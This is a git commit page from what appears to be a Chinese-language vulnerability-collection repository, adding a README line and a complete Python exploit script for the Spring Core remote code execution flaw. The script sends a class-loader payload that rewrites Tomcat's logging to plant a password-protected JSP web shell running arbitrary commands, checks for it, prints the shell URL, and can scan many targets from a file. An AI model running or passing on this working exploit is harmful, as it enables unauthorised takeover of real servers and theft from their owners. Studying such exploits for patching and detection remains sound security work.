Revert "update readme"
This reverts commit 05dbe251efcf51e9e3e0a9c841e2c18dbd619403.
This commit is contained in:
parent
05dbe251ef
commit
614227a7b9
@ -3,6 +3,7 @@
|
||||
> 继 Spring Cloud 之后,3.29 日 ,网上爆出Spring 的又一重量级漏洞:Spring Core RCE
|
||||
|
||||
## 流传的打码poc
|
||||
**目前exp 已上传 ```exp.py```**
|
||||

|
||||

|
||||
|
||||
|
44
22-Spring Core/exp.py
Normal file
44
22-Spring Core/exp.py
Normal file
@ -0,0 +1,44 @@
|
||||
#coding:utf-8
|
||||
|
||||
import requests
|
||||
import argparse
|
||||
from urllib.parse import urljoin
|
||||
|
||||
def Exploit(url):
|
||||
headers = {"suffix":"%>//",
|
||||
"c1":"Runtime",
|
||||
"c2":"<%",
|
||||
"DNT":"1",
|
||||
"Content-Type":"application/x-www-form-urlencoded"
|
||||
|
||||
}
|
||||
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
|
||||
try:
|
||||
|
||||
go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
|
||||
shellurl = urljoin(url, 'tomcatwar.jsp')
|
||||
shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
|
||||
if shellgo.status_code == 200:
|
||||
print(f"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami")
|
||||
except Exception as e:
|
||||
print(e)
|
||||
pass
|
||||
|
||||
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description='Srping-Core Rce.')
|
||||
parser.add_argument('--file',help='url file',required=False)
|
||||
parser.add_argument('--url',help='target url',required=False)
|
||||
args = parser.parse_args()
|
||||
if args.url:
|
||||
Exploit(args.url)
|
||||
if args.file:
|
||||
with open (args.file) as f:
|
||||
for i in f.readlines():
|
||||
i = i.strip()
|
||||
Exploit(i)
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
BIN
22-Spring Core/漏洞分析.pdf
Normal file
BIN
22-Spring Core/漏洞分析.pdf
Normal file
Binary file not shown.
Loading…
x
Reference in New Issue
Block a user